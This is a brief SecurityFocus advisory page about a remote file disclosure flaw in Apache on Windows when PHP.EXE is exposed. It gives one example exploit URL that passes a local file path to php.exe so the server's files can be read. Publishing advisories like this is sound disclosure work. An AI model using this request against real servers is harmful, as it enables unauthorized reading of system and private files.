info
discussion
exploit
solution
references
Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
The following is an example of a URL which is capable of exploiting this issue:
http://[targethost]/php/php.exe?c:\[filepath]
Privacy Statement
Copyright 2010, SecurityFocus
